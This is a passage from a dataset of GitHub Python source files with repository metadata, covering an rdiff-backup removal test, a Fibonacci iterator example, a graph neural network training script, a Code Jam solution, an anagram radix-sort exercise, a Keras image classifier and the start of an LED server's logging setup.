b\"remove\", (\"increments\", \"--older-than\", \"1B\")),\n Globals.RET_CODE_OK)\n # then check that only one increment and mirror remain\n self.assertRegex(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--parsable\"),\n b\"list\", (\"increments\", ), return_stdout=True),\n b\"\"\"---\n- base: increments.1970-01-0[12]T[0-9][0-9][:-][25]0[:-]00.*.dir\n time: 30000\n type: directory\n- base: bak\n time: 40000\n type: directory\n...\n\n\"\"\")\n\n # check that nothing happens if no increment is old enough issue #616\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--force\"),\n b\"remove\", (\"increments\", \"--older-than\", \"30000\")),\n Globals.RET_CODE_WARN)\n self.assertRegex(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--parsable\"),\n b\"list\", (\"increments\", ), return_stdout=True),\n b\"\"\"---\n- base: increments.1970-01-0[12]T[0-9][0-9][:-][25]0[:-]00.*.dir\n time: 30000\n type: directory\n- base: bak\n time: 40000\n type: directory\n...\n\n\"\"\")\n # then remove the last increment\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", ),\n b\"remove\", (\"increments\", \"--older-than\", \"30001\", \"--size\")),\n Globals.RET_CODE_OK)\n # and check that only the mirror is left\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--parsable\"),\n b\"list\", (\"increments\", ), return_stdout=True),\n b\"\"\"---\n- base: bak\n time: 40000\n type: directory\n...\n\n\"\"\")\n # then try to remove the mirror\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", ),\n b\"remove\", (\"increments\", \"--older-than\", \"now\")),\n Globals.RET_CODE_WARN)\n # and check that it is still there\n self.assertEqual(comtst.rdiff_backup_action(\n False, None, self.bak_path, None,\n (\"--api-version\", \"201\", \"--parsable\"),\n b\"list\", (\"increments\", ), return_stdout=True),\n b\"\"\"---\n- base: bak\n time: 40000\n type: 
directory\n...\n\n\"\"\")\n\n        # all tests were successful\n        self.success = True\n\n    def tearDown(self):\n        # we clean-up only if the test was successful\n        if self.success:\n            fileset.remove_fileset(self.base_dir, self.from1_struct)\n            fileset.remove_fileset(self.base_dir, self.from2_struct)\n            fileset.remove_fileset(self.base_dir, self.from3_struct)\n            fileset.remove_fileset(self.base_dir, self.from4_struct)\n            fileset.remove_fileset(self.base_dir, {\"bak\": {\"type\": \"dir\"}})\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"rdiff-backup/rdiff-backup","sub_path":"testing/action_remove_test.py","file_name":"action_remove_test.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":969,"dataset":"github-code","pt":"61"} +{"seq_id":"71160244356","text":"'''\nIterators\nTo implement an iterator, two methods must be implemented:\n1. __iter__(self): this method returns an iterator; the iterator must provide a __next__() method,\n   which returns the iterator's next element.\n2. __reversed__(self): implements reversed iteration over the iterator.\n'''\n\n\n# Define an iterator over the Fibonacci sequence: f(n+2) = f(n+1) + f(n)\n\nclass Fibs:\n    def __init__(self, len):\n        self.first = 0\n        self.sec = 1\n        self.__len = len\n\n    def __next__(self):\n        # if len is 0, stop iterating\n        if self.__len == 0:\n            raise StopIteration\n        # compute the next term of the sequence\n        self.first, self.sec = self.sec, self.first + self.sec\n        # decrement the remaining length\n        self.__len -= 1\n        return self.first\n\n    def __iter__(self):\n        return self\n\n\n# create an instance\nf = Fibs(20)\n# get the iterator's next element\nprint(next(f))\n# loop over the rest of the iterator\nfor i in f:\n    print(i, end=' ')","repo_name":"liukai234/python_course_record","sub_path":"容器/迭代器.py","file_name":"迭代器.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9345212169","text":"import json\nimport os\nimport torch\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom networkx.readwrite import json_graph\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nfrom torch_geometric.loader import NeighborSampler, DataLoader\nfrom torch_geometric.nn import SAGEConv\nfrom torch_geometric.utils import negative_sampling\nfrom torch_cluster import random_walk\nfrom torch_geometric.utils.convert import from_networkx\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\nfrom sklearn.preprocessing import StandardScaler\nfrom torch_geometric.utils import remove_isolated_nodes\nfrom pingumil.models import load_model\nfrom pingumil.util.pytorchtools import EarlyStopping\nfrom pingumil.experiments.gpp.gpp_exp import GPPBaseExperiment, EPS\nimport wandb\nimport time\n\n#wandb stuff\nrun = wandb.init(project=\"fsp\", group=\"gpp_tsp\",\n           config={\n                \"batch_size\" : 512,\n                \"lr\": 1e-3,\n                \"lr_clf\": 1e-5,\n                \"weight_decay\": 1e-5,\n                \"gnn\": \"hgt\"\n           })\n\nexperiment = GPPBaseExperiment(experiment_tag=\"semisup_tsp\",\n                               epochs=1000, \n                               mlc_epochs=200,\n                               timestamp=time.time(),\n                               model_config=\"configs/gpp_hgtmodel.json\",\n                               patience=10,\n                               wandb=wandb,\n                               override_data=False)\n\nprint(experiment.output_file)\n#Read all necessary data\ndataset = experiment.read_data()\n\ngraph_ids = list(dataset.keys())\n'''# supergraph feature/attribute set\natbs_list = []\natbsets_dict = {}\nall_dim_types = []\n\n#Get supergraph feature/attribute set\nfor graph_id, graph_data in dataset.items():\n    for atbsets_list in graph_data[\"atbset_list\"]:\n        #Get list of all attributes in any type of node\n        atbs_list = atbs_list+atbsets_list\n        atbs_list = sorted(list(set(atbs_list)))\n\n# Sort feature sets of all graphs that belong to the dataset (FSE)\nfor 
graph_id, graph_data in dataset.items():\n atbsets_list = graph_data[\"atbset_list\"]\n atbs_maps = {atb : {} for atb in atbs_list}\n f = lambda l,v: l.index(v) if v in l else -1\n for atb in atbs_maps.keys():\n atbs_maps[atb] = {k:f(v,atb) for k,v in enumerate(atbsets_list)}\n node_feats = graph_data[\"node_feats\"]\n node_typencs = []\n for i,_ in enumerate(node_feats):\n new_node_feats = torch.zeros((node_feats[i].shape[0],len(atbs_list)))\n new_node_typencs = torch.zeros((node_feats[i].shape[0],len(atbs_list)))\n #type_encoding = []\n for atb, atb_dict in atbs_maps.items():\n atb_final_index = atbs_list.index(atb)\n #if atb_dict[i] == -1:\n #type_encoding.append(0)\n #else:\n if atb_dict[i] != -1:\n #type_encoding.append(1)\n new_node_feats[:,atb_final_index] = node_feats[i][:, atb_dict[i]]\n new_node_typencs[:,atb_final_index] = torch.ones(node_feats[i].shape[0])\n #print(type_encoding)\n node_feats[i] = new_node_feats\n node_typencs.append(new_node_typencs)\n dataset[graph_id][\"node_feats\"] = torch.cat(node_feats)\n dataset[graph_id][\"node_typencs\"] = torch.cat(node_typencs)\n'''\n# supergraph feature/attribute set\natbs_list = []\natbsets_dict = {}\nall_dim_types = []\n\n#Get supergraph feature/attribute set, create a dictionary from attribute set to a identifier,\n# and add the attribute set identifier in a adjacent graph_data[\"node_types\"] structure\nfor graph_id, graph_data in dataset.items():\n for i, atbsets_list in enumerate(graph_data[\"atbset_list\"]):\n #Get list of all attributes in any type of node\n atbs_list = atbs_list+atbsets_list\n atbs_list = sorted(list(set(atbs_list)))\n if tuple(atbsets_list) not in atbsets_dict:\n atbsets_dict[tuple(atbsets_list)] = len(atbsets_dict)\n assert graph_data[\"node_feats\"][i].size()[1] == len(atbsets_list)\n all_dim_types.append(len(atbsets_list))\n current_node_type = atbsets_dict[tuple(atbsets_list)]\n if \"node_types\" not in dataset[graph_id]:\n dataset[graph_id][\"node_types\"] = []\n if current_node_type not in dataset[graph_id][\"node_types\"]:\n dataset[graph_id][\"node_types\"].append(current_node_type)\n\n'''#Standardize data from all graphs\nexperiment.log(f\"Standardization: {experiment.standardization}\\n\")\nif experiment.standardization:\n dataset = experiment.standardize_all(dataset)'''\n\n#Standardize data from all graphs\nexperiment.log(f\"Standardization: {experiment.standardization}\\n\")\nif experiment.standardization:\n scalers = {}\n # Fit an scaler for each feature/attribute\n for graph_id, graph_data in dataset.items():\n atbsets_list = graph_data[\"atbset_list\"]\n atbs_maps = {atb : {} for atb in atbs_list}\n f = lambda l,v: l.index(v) if v in l else -1\n for atb in atbs_maps.keys():\n atbs_maps[atb] = {k:f(v,atb) for k,v in enumerate(atbsets_list)}\n node_feats = graph_data[\"node_feats\"]\n #For each attribute, apply normalization on node_feats according to the mapping\n for atb, atb_map in atbs_maps.items():\n if atb not in scalers:\n scalers[atb] = StandardScaler()\n node2tuple = tuple([node_feats[k][:,v] for k,v in atb_map.items() if v != -1])\n if len(node2tuple) == 0:\n continue\n atbdata = torch.cat(node2tuple)\n #print(atbdata)\n if ((torch.min(atbdata).item() == 0 and torch.max(atbdata).item() == 1) or torch.equal(atbdata, torch.zeros_like(atbdata))\n or torch.equal(atbdata, torch.ones_like(atbdata))):\n #print(f\"Continuning for {atb}, possible One-Hot-Encoded\")\n continue\n atbdata_t = atbdata.reshape(-1,1)\n scalers[atb] = scalers[atb].partial_fit(atbdata_t)\n \n #Now transform data 
from all graphs\n for graph_id, graph_data in dataset.items():\n atbsets_list = graph_data[\"atbset_list\"]\n atbs_maps = {atb : {} for atb in atbs_list}\n f = lambda l,v: l.index(v) if v in l else -1\n for atb in atbs_maps.keys():\n atbs_maps[atb] = {k:f(v,atb) for k,v in enumerate(atbsets_list)}\n node_feats = graph_data[\"node_feats\"]\n #For each attribute, apply normalization on node_feats according to the mapping\n for atb, atb_map in atbs_maps.items():\n if atb not in scalers:\n scalers[atb] = StandardScaler()\n node2tuple = tuple([node_feats[k][:,v] for k,v in atb_map.items() if v != -1])\n if len(node2tuple) == 0:\n continue\n atbdata = torch.cat(node2tuple)\n #print(atbdata)\n if ((torch.min(atbdata).item() == 0 and torch.max(atbdata).item() == 1) or torch.equal(atbdata, torch.zeros_like(atbdata))\n or torch.equal(atbdata, torch.ones_like(atbdata))):\n #print(f\"Continuning for {atb}, possible One-Hot-Encoded\")\n continue\n split_dim = [node_feats[k][:,v].shape[0] for k,v in atb_map.items() if v!=-1]\n atbdata_t = atbdata.reshape(-1,1)\n atbdata_std = torch.from_numpy(scalers[atb].fit_transform(atbdata_t).reshape(1,-1))\n split_atbdata_std = torch.split(atbdata_std[0], split_dim)\n i = 0\n for k,v in atb_map.items():\n if v == -1:\n continue\n node_feats[k][:,v] = split_atbdata_std[i]\n i = i + 1\n dataset[graph_id][\"node_feats\"] = node_feats\n\n#Configuration\nnum_samples = [-1,-1]\nwalk_length = 1\nbatch_size = wandb.config.batch_size\nmha_batch_size = 256\nnum_neg_samples = 1\nepochs = experiment.epochs\ngnn_input_dim = 128\n\ndef find_nodemap(fnid, node_maps):\n offset = 0\n for i,v in enumerate(node_maps):\n if fnid < offset + len(v):\n return i\n offset += len(v)\n\nall_node_types=[]\n# #update edge_index according to node_maps\nfor graph_id, graph_data in dataset.items():\n dict_x2m = {}\n node_maps = graph_data[\"node_maps\"]\n data = graph_data[\"graph\"]\n node_feats = graph_data[\"node_feats\"]\n node_types = graph_data[\"node_types\"]\n #update edge_index according to node_maps\n for node_map in node_maps:\n offset = len(dict_x2m)\n dict_x2m.update({k+offset:v for k,v in enumerate(node_map)})\n data.edge_index[0] = torch.LongTensor([dict_x2m[idx] for idx in data.edge_index[0].tolist()])\n data.edge_index[1] = torch.LongTensor([dict_x2m[idx] for idx in data.edge_index[1].tolist()])\n data.x_ts = node_feats\n data.t_ts = node_types\n \n num_nodes = sum([x.size(0) for x in node_feats])\n node_types = [find_nodemap(x, node_maps) for x in range(num_nodes)]\n data.node_types = torch.Tensor(node_types)\n all_node_types = list(set(all_node_types + node_types))\n data.class_map = graph_data[\"class_map\"]\n graph_data[\"graph\"] = data\n dataset[graph_id][\"dict_x2m\"] = dict_x2m\n\nedge_type_dict = {}\nnum_edge_types = 0\nfor i in range(len(all_node_types)):\n edge_type_dict[i] = {}\n for j in range(i,len(all_node_types)):\n edge_type_dict[i][j] = num_edge_types\n num_edge_types += 1\n\ndef get_edge_type_index(fnids):\n #print(fnids)\n node_label_ids = fnids\n node_label_ids.sort()\n i, j = node_label_ids[0], node_label_ids[1]\n return edge_type_dict[i][j]\n\n'''subgraph_loader = NeighborSampler(\n data.edge_index, node_idx=None,\n sizes=[-1], batch_size=batch_size, shuffle=False,\n num_workers=0)'''\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\ngnn_config = json.load(open(experiment.model_config))[0]\ngnn_config[\"in_dim\"] = 128\ngnn_config[\"num_types\"] = 1\ngnn_config[\"num_relations\"] = num_edge_types\ngnn_model = 
load_model(gnn_config)\nprint(gnn_model)\ngnn_model = gnn_model.to(device)\n\ntypeproj_config = {\n \"model\": \"typeprojection\",\n \"dim_types\": all_dim_types,\n \"dim_output\": gnn_config[\"in_dim\"]\n}\ntypeproj_model = load_model(typeproj_config)\ntypeproj_model = typeproj_model.to(device)\n\ntypeproj_optimizer = torch.optim.Adam(typeproj_model.parameters(),\n lr=wandb.config.lr)\ngnn_optimizer = torch.optim.Adam(gnn_model.parameters(),\n lr=wandb.config.lr,\n weight_decay=wandb.config.weight_decay)\n#x = data.x.to(device)\n\n#data_list = [graph_data[\"graph\"] for graph_id, graph_data in dataset.items()]\n#loader = DataLoader(data_list, batch_size=batch_size)\n\n#torch.autograd.set_detect_anomaly(True)\nexperiment.log(f\"Device: {device}, visible devices: {os.environ['CUDA_VISIBLE_DEVICES']}\\n\")\nexperiment.log(f\"Type Projection: {typeproj_model}\\n\")\nexperiment.log(f\"Graph Representation Learning Model: {gnn_model}\\n\")\n\ndef train(epoch):\n graph_loss = 0\n i = 1\n for _, graph_data in dataset.items():\n data = graph_data[\"graph\"]\n if data.edge_index.size()[-1] < batch_size:\n continue\n x_ts = [x_t.to(device) for x_t in data.x_ts]\n node_types = data.node_types.to(device)\n \n gnn_model.train()\n typeproj_model.train()\n\n pbar = tqdm(total=data.num_nodes)\n pbar.set_description(f'Epoch {epoch:02d}')\n\n #Type Projection Step\n #print(x)\n x_p = typeproj_model(x_ts, data.t_ts)\n #print(x_p)\n #print(x[0])\n total_loss = 0\n \n edges_as_list = zip(data.edge_index[0].tolist(),\n data.edge_index[1].tolist())\n\n pos_edge_types = torch.Tensor(\n [get_edge_type_index([int(node_types[i]),int(node_types[j])]) for i,j in edges_as_list])\n pos_edge_types = pos_edge_types.to(device)\n \n pos_train_edge_loader = DataLoader(torch.arange(data.edge_index.size()[-1]),\n batch_size=wandb.config.batch_size, shuffle=True)\n\n\n train_neg_edge_index = negative_sampling(\n edge_index=data.edge_index,\n num_nodes = data.num_nodes\n )\n \n #train_edges = torch.cat([data.train_pos_edge_index, train_neg_edge_index], dim=-1).to(device)\n neg_edges_as_list = zip(train_neg_edge_index[0].tolist(),\n train_neg_edge_index[1].tolist())\n \n neg_edge_types = torch.Tensor(\n [get_edge_type_index([int(node_types[i]),int(node_types[j])]) for i,j in neg_edges_as_list])\n neg_edge_types = neg_edge_types.to(device)\n neg_train_edge_loader = DataLoader(torch.arange(train_neg_edge_index.size()[-1]),\n batch_size=wandb.config.batch_size, shuffle=True)\n zero_node_types = torch.zeros_like(torch.Tensor(node_types)).to(device)\n\n typeproj_optimizer.zero_grad()\n\n for pos_batch_edge_idx, neg_batch_edge_idx in zip(pos_train_edge_loader, neg_train_edge_loader):\n train_edge_time = torch.Tensor([0]*data.edge_index.size(-1))\n train_edge_time = train_edge_time.to(device)\n \n z_pos = gnn_model(x_p, zero_node_types, train_edge_time,\n data.edge_index[:,pos_batch_edge_idx].to(device),\n pos_edge_types[pos_batch_edge_idx]\n )\n \n node_i, node_j = data.edge_index[:,pos_batch_edge_idx][0], data.edge_index[:,pos_batch_edge_idx][1]\n #print(node_i.size())\n #print(node_j.size())\n out = (z_pos[node_i] * z_pos[node_j]).sum(dim=-1).view(-1)\n pos_loss = -torch.log(torch.sigmoid(out) + EPS).mean()\n \n z_neg = gnn_model(x_p, node_types, train_edge_time,\n train_neg_edge_index[:,neg_batch_edge_idx].to(device),\n neg_edge_types[neg_batch_edge_idx].to(device))\n node_i, node_j = train_neg_edge_index[:,neg_batch_edge_idx][0], train_neg_edge_index[:,neg_batch_edge_idx][1]\n #print(node_i.size())\n #print(node_j.size())\n out = 
(z_neg[node_i] * z_neg[node_j]).sum(dim=-1).view(-1)\n            neg_loss = -torch.log(1 - torch.sigmoid(out) + EPS).mean()\n            gnn_optimizer.zero_grad()\n            loss = pos_loss + neg_loss\n            loss.backward(retain_graph=True)\n            gnn_optimizer.step()\n\n            wandb.log({\"emb batch loss\":loss.item()})\n            total_loss += loss.item()\n            pbar.update(len(pos_batch_edge_idx)/2)\n        typeproj_optimizer.step()\n        pbar.close()\n\n        loss = total_loss / len(pos_train_edge_loader)\n        wandb.log({\"emb loss\":loss})\n\n        graph_loss = graph_loss + loss\n        i = i+1\n    return graph_loss/i\n\ngnn_early_stopping = experiment.get_early_stopping(verbose=True,\n                                                   prefix=\"embed\")\nproj_early_stopping = experiment.get_early_stopping(verbose=True,\n                                                    prefix=f\"proj\")\nbest_loss = np.inf\nfor epoch in range(1, experiment.epochs):\n    loss = train(epoch)\n    wandb.log({\"train loss\":loss})\n    if loss < best_loss:\n        best_loss = loss\n    gnn_early_stopping(loss, gnn_model)\n    proj_early_stopping(loss, typeproj_model)\n    print(f'Epoch {epoch:02d}, Loss: {loss:.4f}')\n    if gnn_early_stopping.early_stop:\n        print(\"Early Stopping!\")\n        break\nprint(f'Best Loss: {best_loss:.4f}')\nexperiment.log(f'Epoch: {epoch} -> Loss (Representation Learning): {best_loss:.4f}')\n\ntypeproj_model.load_state_dict(torch.load(proj_early_stopping.path))\ngnn_model.load_state_dict(torch.load(gnn_early_stopping.path))\n\nx_multi = []\ny_multi = []\nfor graph_id, graph_entry in dataset.items():\n    graph_data = graph_entry[\"graph\"]\n    if None in graph_data.class_map.values():\n        continue\n    data = graph_data.to(device)\n    node_types = data.node_types.to(device)\n    x_p = typeproj_model(data.x_ts, data.t_ts)\n    train_pos_edge_index = data.edge_index.to(device)\n    edges_as_list = zip(data.edge_index[0].tolist(),\n                        data.edge_index[1].tolist())\n    pos_edge_types = torch.Tensor(\n        [get_edge_type_index([int(node_types[i]), int(node_types[j])]) for i,j in edges_as_list])\n    pos_edge_types = pos_edge_types.to(device)\n    zero_node_types = torch.zeros_like(torch.Tensor(node_types)).to(device)\n    train_edge_time = torch.Tensor([0]*data.edge_index.size(-1))\n    train_edge_time = train_edge_time.to(device)\n    print(x_p.size(), zero_node_types.size(),\n          train_edge_time.size(),\n          train_pos_edge_index.size(),\n          pos_edge_types.size())\n    z = gnn_model(x_p, zero_node_types, train_edge_time, train_pos_edge_index, pos_edge_types).detach()\n    z = z.to(device)\n    graph_dx2m = graph_entry[\"dict_x2m\"]\n    x_multi = x_multi + [z[graph_dx2m[int(x)]] for x in graph_data.class_map.keys()]\n    y_multi = y_multi + [torch.Tensor(list(graph_data.class_map.values()))[0]]\n\nx_multi = torch.stack(x_multi)\nprint(x_multi.size())\ny_multi = torch.stack(y_multi)\nprint(y_multi.size())\n\nassert x_multi.size(0) == y_multi.size(0)\n\ny_bartle = y_multi[:,:4]\ny_dedica = y_multi[:,4:]\n\nassert y_bartle.size(1) == 4\nassert y_dedica.size(1) == 2\n\nfor label, y_gt in [(\"bartle\", y_bartle), (\"dedication\", y_dedica)]:\n    multilabel_config = json.load(open(experiment.model_config))[1]\n    multilabel_config[\"in_channels\"] = x_multi.size(1)\n    multilabel_config[\"out_channels\"] = y_gt.size(1)\n    multilabel_model = load_model(multilabel_config).to(device)\n\n    experiment.log(f\"Multilabel Classification Model: {multilabel_model}_{label}\\n\")\n\n    experiment.multilabel_classification_step(device, multilabel_model,\n                                              x_multi, y_gt, list(dataset.keys()),\n                                              wandb, 
suffix=label)\n\nexperiment.get_quality_results()","repo_name":"sidneyaraujomelo/PingUMiL","sub_path":"pingumil/experiments/gpp/gpp_unsup_hgt_tsp.py","file_name":"gpp_unsup_hgt_tsp.py","file_ext":"py","file_size_in_byte":18265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23409718581","text":"#!/usr/bin/python\n\nimport sys\n\ndef extractQuiz(lines):\n\tanswer1=int(lines[0].strip())\n\tanswer2=int(lines[5].strip())\n\tarrange1=[]\n\tarrange2=[]\n\tfor i in range(1,5):\n\t\tarrange1.append(lines[i].split())\n\t\tarrange2.append(lines[i+5].split())\n\treturn (answer1,arrange1,answer2,arrange2)\n\ndef readFile(dir):\n\tf=open(dir)\n\tlines=f.readlines()\n\tT=int(lines[0].strip())\n\trt=[]\n\tfor i in range(T):\n\t\t#print lines[1+i*10:11+i*10]\n\t\trt.append(extractQuiz(lines[1+i*10:11+i*10]))\n\treturn rt\n\ndef solveQuiz(quiz):\n\trow1=set(quiz[1][quiz[0]-1])\n\trow2=set(quiz[3][quiz[2]-1])\n\tcard=row1.intersection(row2)\n\t#print quiz[1],quiz[0]\n\tif len(card)==1:\n\t\treturn list(card)[0]\n\telif len(card)>1:\n\t\treturn \"Bad magician!\"\n\telse:\n\t\treturn \"Volunteer cheated!\"\n\nif __name__==\"__main__\":\n\tquizs=readFile(sys.argv[1])\n\tfor i in range(len(quizs)):\n\t\tprint(\"Case #%s: %s\"%(i+1,solveQuiz(quizs[i])))\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1083.py","file_name":"1083.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70489389956","text":"from kol1btesty import runtests\n\ndef split(word):\n    n = len(word)\n    A = [0 for _ in range(26)]\n    for i in range(n):\n        A[ord(word[i]) - ord('a')] += 1\n    return A\n\ndef counting_sort(A, k, index):\n    n = len(A)\n    C = [0 for _ in range(k)]\n    B = [0 for _ in range(n)]\n    for x in A:\n        C[x[index]] += 1\n    for i in range(1, k):\n        C[i] = C[i] + C[i - 1]\n    for i in range(n - 1, -1, -1):\n        B[C[A[i][index]] - 1] = A[i]\n        C[A[i][index]] -= 1\n    for i in range(n):\n        A[i] = B[i]\n    return A\n\ndef f(T):\n    n = len(T)\n    maks = 0\n    for i in range(n):\n        T[i] = split(T[i])\n    for ind in range(25, -1, -1):\n        maks_int = 0\n        for i in range(n):\n            maks_int = max(maks_int, max(T[i]))\n        counting_sort(T, maks_int+1, ind)\n    cnt = 1\n    for i in range(1, n):\n        if T[i-1] == T[i]:\n            cnt += 1\n        else:\n            maks = max(maks, cnt)\n            cnt = 1\n    return max(maks, cnt)\n\n\nfrom typing import List\n\n\"\"\"\nFind anagrams. The algorithm starts by converting each word into an array of letter counts. \nThe arrays are then radix-sorted, applying a stable counting sort on each of the 26 letters. 
Finally, a loop finds the most frequent word among the sorted \narrays.\n\"\"\"\n\n\ndef countingsort(A: List[List[int]], k: int, index: int) -> None:  # stable counting sort on each index\n    n = len(A)\n    C = [0 for _ in range(k)]\n    B = [0 for _ in range(n)]\n\n    for i in range(n):\n        C[A[i][index]] += 1\n\n    for i in range(1, k):\n        C[i] = C[i] + C[i - 1]\n\n    for i in range(n - 1, -1, -1):\n        B[C[A[i][index]] - 1] = A[i]\n        C[A[i][index]] -= 1\n\n    for i in range(n):\n        A[i] = B[i]\n\n\ndef f2(T: List[str]) -> int:\n    n = len(T)\n    A = [[0 for _ in range(26)] for _ in range(n)]\n\n    for i in range(n):\n        for s in T[i]:\n            A[i][ord(s) - 97] += 1\n\n    for i in range(26):\n        k = 0\n        for j in range(n):\n            k = max(A[j][i], k)  # finding k for counting sort\n\n        k += 1\n        countingsort(A, k, i)\n\n    ans = count = 1\n    check = A[0]\n    for i in range(1, n):\n        if A[i] == check:\n            count += 1\n        else:\n            ans = max(ans, count)\n            count = 1\n            check = A[i]\n\n    ans = max(ans, count)  # check the final run, since it never reaches the else branch\n    return ans\n\n\n# if __name__ == '__main__':\n#     tab =['tygrys', 'kot', 'wilk', 'trysyg', 'wlik', 'sygryt', 'likw', 'tygrys']\n#     print(f(tab))\n\n\n# Change all_tests=False to all_tests=True to run all the tests\nruntests( f, all_tests=True )\n","repo_name":"Deevo87/asd-algorithms","sub_path":"sorting/exercise_from_exams_sorting/kolosy/kolos_21_22/zad1/kol1b.py","file_name":"kol1b.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38025263301","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport os\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, Dropout\nfrom tensorflow.keras import utils\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.preprocessing import image_dataset_from_directory\nfrom tensorflow.keras.models import load_model\nfrom keras.layers import Dense, Conv2D, MaxPool2D , Flatten\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\nimport pandas as pd\n\n\nbatch_size=30\nimage_size=(128, 128)\n\ne = int(input(\"\\nEnter the number of epochs to train the network: \"))\n\ntrain_dataset = image_dataset_from_directory('./traning_set',\n                                             subset='training',\n                                             seed=42,\n                                             validation_split=0.1,\n                                             batch_size=batch_size,\n                                             image_size=image_size,\n                                             color_mode=\"grayscale\")\n\nvalidation_dataset = image_dataset_from_directory('./traning_set',\n                                                  subset='validation',\n                                                  seed=42,\n                                                  validation_split=0.1,\n                                                  batch_size=batch_size,\n                                                  image_size=image_size,\n                                                  color_mode=\"grayscale\")\n\n\nclass_names = train_dataset.class_names\n\nimport csv \n\nwith open(\"class_names.csv\", \"w\", newline='') as file:\n    csv.writer(file).writerow(class_names)\n\ntest_dataset = image_dataset_from_directory('./test_set',\n                                            seed=42, \n                                            batch_size=batch_size,\n                                            image_size=image_size,\n                                            color_mode=\"grayscale\")\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n\ntrain_dataset = train_dataset.prefetch(buffer_size=AUTOTUNE)\nvalidation_dataset = validation_dataset.prefetch(buffer_size=AUTOTUNE)\ntest_dataset = test_dataset.prefetch(buffer_size=AUTOTUNE)\n\n# Create a sequential model\nmodel_f7_5_3_drop = Sequential()\n# Convolutional layer\nmodel_f7_5_3_drop.add(Conv2D(16, 
(7, 7), padding='same', \n                 input_shape=(128, 128, 1), activation='relu'))\n# Subsampling (pooling) layer\nmodel_f7_5_3_drop.add(MaxPooling2D(pool_size=(2, 2)))\n# Convolutional layer\nmodel_f7_5_3_drop.add(Conv2D(32, (5, 5), padding='same', \n                 input_shape=(128, 128, 1), activation='relu'))\n# Subsampling (pooling) layer\nmodel_f7_5_3_drop.add(MaxPooling2D(pool_size=(2, 2)))\n# Convolutional layer\nmodel_f7_5_3_drop.add(Conv2D(64, (3, 3), padding='same', \n                 input_shape=(128, 128, 1), activation='relu'))\n# Subsampling (pooling) layer\nmodel_f7_5_3_drop.add(MaxPooling2D(pool_size=(2, 2)))\n# Fully connected part of the network for classification\nmodel_f7_5_3_drop.add(Flatten())\nmodel_f7_5_3_drop.add(Dense(512, activation='relu'))\nmodel_f7_5_3_drop.add(Dropout(0.1))\n# Output layer: 208 neurons, one per class\nmodel_f7_5_3_drop.add(Dense(208, activation='softmax'))\nmodel_f7_5_3_drop.summary()\n\nmodel_f7_5_3_drop.compile(loss='sparse_categorical_crossentropy',\n              optimizer=\"adam\",\n              metrics=['accuracy'])\n\nhistory = model_f7_5_3_drop.fit(train_dataset, \n                    validation_data=validation_dataset,\n                    epochs=e,\n                    verbose=2)\n\nmodel_f7_5_3_drop.save(\"Symbol_Check_model_f7_5_3_drop.h5\")\n\nscores = model_f7_5_3_drop.evaluate(test_dataset, verbose=1)\n\nprint(\"\\nThe network has been saved to file: Symbol_Check_model_f7_5_3_drop.h5\")\n","repo_name":"OlegMyagkov/GraduationWork","sub_path":"Check_Sym_Pic/Classificator_V_1_0_0.py","file_name":"Classificator_V_1_0_0.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11955141687","text":"import argparse\nimport logging\nimport os\nimport signal\nimport sys\nfrom logging import handlers\n\nfrom server.configmanager import ConfigurationManager\nfrom server.crossbarintegration.crossbarmanager import CrossbarManager\nfrom server.ledmanager import LEDManager\nfrom server.ledserver import LEDServer\n\ncrossbarManager = None\nledServer = None\n\n\ndef initLogger(loggerName, logPath, fileLogLevel, consoleLogLevel):\n    logger = logging.getLogger(loggerName)\n    loggerLevel = min(fileLogLevel, consoleLogLevel)\n    logger.setLevel(loggerLevel)\n    logFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\n    fileHandler = handlers.TimedRotatingFileHandler(logPath, when='D', backupCount=7)\n    fileHandler.setFormatter(logFormatter)\n    fileHandler.setLevel(fileLogLevel)\n    logger.addHandler(fileHandler)\n\n    consoleHandler = logging.StreamHandler()\n    consoleHandler.setFormatter(logFormatter)\n    consoleHandler.setLevel(consoleLogLevel)\n    logger.addHandler(consoleHandler)\n\n\ndef initLogging(logPath, fileLogLevel, consoleLogLevel, accessLogToConsole):\n    initLogger(\"main\", logPath + \"/piledcontrol.log\", fileLogLevel, consoleLogLevel)\n    if accessLogToConsole:\n        consoleLogLevel = consoleLogLevel\n    else:\n        